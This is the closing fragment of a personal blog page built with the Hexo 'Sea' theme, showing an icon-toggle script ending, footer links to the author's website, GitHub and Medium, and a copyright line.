        toggleIcon.classList.toggle('sea-svg-icon-rotate');
      });
    }
  });
</script>
  </main>
  <footer id="sea-footer-container">
  <div class="sea-footer-row">
    <div class="sea-footer-menu-link">
      
        <a
          class="sea-footer-link"
          
            target="_blank"
          
          href="https://dinlon5566.com/"
        >
          Website
        </a>
        <span class="sea-footer-link__dot">·</span>
      
        <a
          class="sea-footer-link"
          
            target="_blank"
          
          href="https://github.com/dinlon5566"
        >
          Github
        </a>
        <span class="sea-footer-link__dot">·</span>
      
        <a
          class="sea-footer-link"
          
            target="_blank"
          
          href="https://medium.com/@dinlon5566"
        >
          Medium
        </a>
        <span class="sea-footer-link__dot">·</span>
      
    </div>
  </div>
  
  
  <div class="sea-footer-row">
    <div class="sea-footer-copyright">
      <span>©</span>
      
        2026
      
      <span>·</span>
      Dinlon5566
    </div>
    <span class="split-line">|</span>
    <div class="sea-footer-theme-by">
      Theme by <a class="theme" href="https://github.com/hai-zou/hexo-theme-sea" target="_blank">Sea</a>
    </div>
  </div>
</footer>

  
<script src="/js/main.js" defer></script>


<script src="/js/theme.js" defer></script>

</body>
</html>